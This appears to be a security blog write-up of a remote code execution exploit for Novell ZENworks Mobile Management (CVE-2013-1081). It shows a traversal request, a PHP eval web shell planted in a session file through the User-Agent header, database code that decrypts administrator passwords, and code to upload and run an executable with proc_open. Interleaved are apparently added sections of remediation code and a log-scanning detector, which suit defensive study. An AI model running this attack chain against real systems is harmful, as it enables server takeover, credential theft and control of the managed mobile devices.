
Sunday, 23 August 2020

Novell Zenworks MDM: Mobile Device Management For The Masses

I'm pretty sure the reason Novell titled their Mobile Device Management (MDM, yo) under the 'Zenworks' group is because the developers of the product HAD to be in a state of meditation (sleeping) when they were writing the code you will see below.


For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:
Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]
I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.
The actual CVE details are as follows:
"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."
After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed, it looked pretty obvious right away (one request?) where the bug may exist:
POST /DUSAP.php HTTP/1.1
Host: 192.168.20.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.133/index.php
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit=
Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:
<?php
session_start();

$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';

if ($Language !== ''  &&  $Language != $_SESSION["language"])
{
     //check for validity
     if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
     {
          $_SESSION["language"] = $Language;
     }
}

if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}

$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);
In English:

  • Check if the "language" parameter is passed in on the request
  • If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
  • The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
  • If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
  • If the session variable "language" is set, include it into the page
  • Authenticate

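As an added example (my code, not Novell's and not from the original post), here is what the language selection block above looks like with a real allowlist instead of a prefix check: the client sends a short language code, the server maps it to a file name, and realpath() confirms the result sits inside res/languages before anything is included. The names resolveLanguageFile and LANGUAGE_FILES, and the second language file, are assumptions; only English.php is known from the page.

```php
<?php
// Added example, not Novell's code: an allowlisted replacement for the
// language selection in DUSAP.php. resolveLanguageFile() and LANGUAGE_FILES
// are names chosen for this example; only English.php is known from the page.
declare(strict_types=1);

// The client may only ever pick one of these short codes.
const LANGUAGE_FILES = [
    'en' => 'English.php',
    'de' => 'German.php',   // assumed second language file
];

/**
 * Map a client-supplied code to an absolute path under $baseDir.
 * Returns null for anything not on the allowlist or not resolving
 * inside $baseDir, so a traversal string can never reach require_once.
 */
function resolveLanguageFile(string $code, string $baseDir): ?string
{
    if (!array_key_exists($code, LANGUAGE_FILES)) {
        return null;                                   // unknown code
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . DIRECTORY_SEPARATOR . LANGUAGE_FILES[$code]);
    if ($base === false || $file === false) {
        return null;                                   // file missing
    }
    // Belt and braces: the resolved path must start with "<base>/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $file;
}

// Drop-in for the block in DUSAP.php that stores and includes the language.
session_start();
$langDir   = __DIR__ . DIRECTORY_SEPARATOR . 'res' . DIRECTORY_SEPARATOR . 'languages';
$requested = (string)($_REQUEST['language'] ?? '');

// Store the validated *code* in the session, never a client-supplied path,
// so tampering with the session file cannot redirect the include either.
if ($requested !== '' && resolveLanguageFile($requested, $langDir) !== null) {
    $_SESSION['language'] = $requested;
}
$current = $_SESSION['language'] ?? 'en';
require_once resolveLanguageFile($current, $langDir)
    ?? $langDir . DIRECTORY_SEPARATOR . 'English.php';
```

The important difference from the original is that the session only ever holds a key into LANGUAGE_FILES, so neither the request parameter nor a crafted session file can name the path that reaches require_once; the realpath() comparison is a second line of defence in case the allowlist itself is ever misconfigured.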
So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:
$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;
The "$error" value is server controlled, the "language" has to be a valid file on the system (can't stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next, I started searching through the code for spots where "$_SESSION" is manipulated, hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:
egrep -R '\$_SESSION\[.*\] =' ./
This pulled up a ton of results, including the following:
/desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
Taking a look at the "download.php" file, the following was observed:

<?php
session_start();
if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);

$ext = substr(strrchr($filename, '.'), 1);

if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey']  > 0)
{

} else
{
     $_SESSION['$error'] = LOGIN_FAILED_TEXT;
     header('Location: index.php');

}
The line that assigns "user_agent" sets a new session variable to whatever our browser is sending, good so far.... The "if" block that follows checks our session for "$DeviceSAKey", which is used to check that the requester is authenticated in the system; in this case we are not, so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops), we can use this to store our payload to be included :)


This will create a session file named "sess_payload" that we can include, the file contains the following:
user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";
Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system". Well, the application installs and configures IIS to use a "guest" account for executing everything: no execute permissions for system stuff (cmd.exe, etc.) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the function, so it can be assumed it is magic:
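The fix for the ordering problem just described, as an added example (my code, not Novell's): the head of download.php with the authentication check moved in front of every session write, an exit after the redirect, and PHP's session.use_strict_mode turned on so that a client-chosen session id is replaced by a server-generated one. The helper name isAuthenticated is mine; the session keys come from the page.

```php
<?php
// Added example, not Novell's code: the start of download.php reordered so
// that nothing is written into the session before the caller is known to
// be authenticated. isAuthenticated() is a name chosen for this example.
declare(strict_types=1);

// Reject session ids the server did not issue: a cookie of PHPSESSID=payload
// gets a fresh id instead of creating sess_payload. Prefer setting this in
// php.ini; ini_set() only works here because it runs before session_start().
ini_set('session.use_strict_mode', '1');
session_start();

/** True only for a session that completed mdm_AuthenticateUser() successfully. */
function isAuthenticated(array $session): bool
{
    return isset($session['$DeviceSAKey']) && (int)$session['$DeviceSAKey'] > 0;
}

if (!isAuthenticated($_SESSION)) {
    // The language file normally defines LOGIN_FAILED_TEXT; fall back if it is not loaded.
    $_SESSION['$error'] = defined('LOGIN_FAILED_TEXT') ? LOGIN_FAILED_TEXT : 'Login Failed';
    header('Location: index.php');
    exit;   // the original keeps executing after header(); stop here instead
}

// Only now, for an authenticated user, is anything from the request stored.
$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'] ?? '';
$active_user_agent      = strtolower($_SESSION['user_agent']);

$filedata   = $_SESSION['filedata'] ?? '';
$filename   = $_SESSION['filename'] ?? '';
$usersakey  = $_SESSION['UserSAKey'] ?? null;
$ext        = substr(strrchr($filename, '.') ?: '', 1);
```

Strict mode on its own is not enough: the server still answers with a Set-Cookie carrying the new id, so an attacker would simply learn the name of the session file that was created for them. Moving the session write behind the authentication check is the change that actually closes the hole; use_strict_mode is defence in depth against session fixation generally.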
return mdm_DecryptData($result[0]['Password']); 
Turns out it is magic, so I sent the following PHP to be executed on the server:
$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);
 


Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc….

This functionality has been wrapped up into a metasploit module that is available on github:

Next up is bypassing the fact that we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these functions try to execute whatever is sent via the system "shell", in this case "cmd.exe", which we do not have rights to execute. Lucky for us, PHP provides "proc_open", and specifically "proc_open" allows us to set the "bypass_shell" option. Knowing this, we need to figure out how to get an executable on the server and where we can put it. The "where" part is easy: the PHP process user has to be able to write to the PHP "temp" directory in order to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:
$wdir=getcwd()."\\..\\..\\php\\temp\\";
file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input")));
This bit of PHP will read the HTTP POST's body (php://input), base64 decode its contents, and write it to a file in the location we have specified. This location is relative to where we are executing, so it should work no matter what directory the product is installed to.


After we have uploaded the file we can then carry out another request to execute what has been uploaded:
$wdir=getcwd()."\\..\\..\\php\\temp\\";
$cmd=$wdir."cmd.exe";
$output=array();
// bypass_shell: run the executable directly instead of via cmd.exe
$handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true));
if(is_resource($handle))
{
     $output=explode("\n",stream_get_contents($pipes[1]));
     fclose($pipes[1]);
     proc_close($handle);
}
foreach($output as $temp){echo $temp."\r\n";}
The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)
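From the defender's side, every step of this chain leaves a trace in the web server log, and the three request patterns the write-up relies on (PHP source in a User-Agent header, a session id the server never issued, and a "language" value that is not simply res/languages/<Name>.php) are cheap to flag. The following is an added example of mine, not code from the original post or from Novell, that scans IIS W3C extended log lines for those patterns. The log lines are constructed for the example and assume the optional cs(User-Agent) and cs(Cookie) fields were enabled in IIS logging; the session id rule assumes PHP's default session id format.

```php
<?php
// Added example, not code from the original post: scan IIS W3C log lines
// for the request patterns this write-up describes. The sample lines are
// constructed; the field set assumes cs(User-Agent) and cs(Cookie) logging
// was enabled in IIS (both are optional fields).
declare(strict_types=1);

// A legitimate language value is exactly res/languages/<Name>.php.
const LANGUAGE_OK = '#^res[/\\\\]languages[/\\\\][A-Za-z]+\.php$#';
// PHP itself only issues session ids of 22-256 chars from [A-Za-z0-9,-];
// anything else was chosen by the client (assumes default session settings).
const SESSION_ID_OK = '#^[A-Za-z0-9,-]{22,256}$#';

// Constructed sample log; line 4 and line 5 are the ones that should fire.
const SAMPLE_LOG = <<<'LOG'
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent) cs(Cookie)
2013-03-10 10:00:01 192.168.20.50 POST /DUSAP.php - 200 Mozilla/5.0+(Windows+NT+6.1)+Firefox/21.0 PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
2013-03-10 10:00:07 192.168.20.50 GET /desktop/download.php - 302 <?php+echo(eval($_GET['cmd']));+?> PHPSESSID=payload
2013-03-10 10:00:09 192.168.20.50 GET /DUSAP.php language=res%2Flanguages%2F..%2F..%2F..%2Fwindows%2Fwin.ini 200 Mozilla/5.0+(Windows+NT+6.1)+Firefox/21.0 PHPSESSID=payload
2013-03-10 10:00:15 192.168.20.51 GET /DUSAP.php language=res%2Flanguages%2FEnglish.php 200 Mozilla/5.0+(X11;+Linux+x86_64) PHPSESSID=qp1s9d8f7g6h5j4k3l2m1n0o9p
LOG;

/**
 * Inspect one parsed record and return the reasons it looks suspicious
 * (an empty array means nothing matched).
 */
function inspectRecord(array $f): array
{
    $reasons = [];

    // cs-uri-query is logged raw; parse_str() decodes %xx and '+' for us.
    parse_str($f['cs-uri-query'] === '-' ? '' : $f['cs-uri-query'], $q);
    if (isset($q['language']) && !preg_match(LANGUAGE_OK, (string)$q['language'])) {
        $reasons[] = 'language parameter outside res/languages allowlist';
    }
    if (isset($q['cmd'])) {
        $reasons[] = 'cmd parameter sent to a PHP page';
    }

    // IIS writes spaces inside the User-Agent as '+'.
    $ua = str_replace('+', ' ', $f['cs(User-Agent)']);
    if (preg_match('#<\?(php|=)|\beval\s*\(#i', $ua)) {
        $reasons[] = 'PHP code in User-Agent';
    }

    if (preg_match('#(?:^|;\s*)PHPSESSID=([^;]*)#', $f['cs(Cookie)'], $m)
        && !preg_match(SESSION_ID_OK, $m[1])) {
        $reasons[] = 'client-chosen PHPSESSID value';
    }
    return $reasons;
}

/**
 * Parse W3C extended log text and return [lineNumber => [reasons...]]
 * for every record that triggered at least one rule.
 */
function scanLog(string $text): array
{
    $fields   = [];
    $findings = [];
    foreach (explode("\n", $text) as $i => $line) {
        if (strncmp($line, '#Fields:', 8) === 0) {
            $fields = preg_split('/\s+/', trim(substr($line, 8)));
            continue;
        }
        if ($line === '' || $line[0] === '#' || $fields === []) {
            continue;                                  // directive or no header yet
        }
        $values = explode(' ', $line, count($fields)); // last field keeps any remainder
        if (count($values) !== count($fields)) {
            continue;                                  // malformed record, skip
        }
        $reasons = inspectRecord(array_combine($fields, $values));
        if ($reasons !== []) {
            $findings[$i + 1] = $reasons;
        }
    }
    return $findings;
}

foreach (scanLog(SAMPLE_LOG) as $lineNo => $reasons) {
    echo "line $lineNo: " . implode('; ', $reasons) . "\n";
}
```

Two caveats when running this against real logs. IIS does not log POST bodies, so the initial POST to DUSAP.php with the traversal in the form body is invisible to the language rule; only the GET form, which the script's use of $_REQUEST also accepts, shows up in cs-uri-query. And the session id rule is a heuristic on PHP's id format, so a host that overrides session.sid_length or session.sid_bits_per_character needs the regex adjusted. On the mitigation side, the same process-user ACL and php.ini choices the write-up leans on (execute permission on the PHP temp directory, proc_open not being in disable_functions) are the settings a hardening pass would revisit.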

This process was then rolled up into a metasploit module which is available here:


Update: Metasploit modules are now available as part of metasploit.

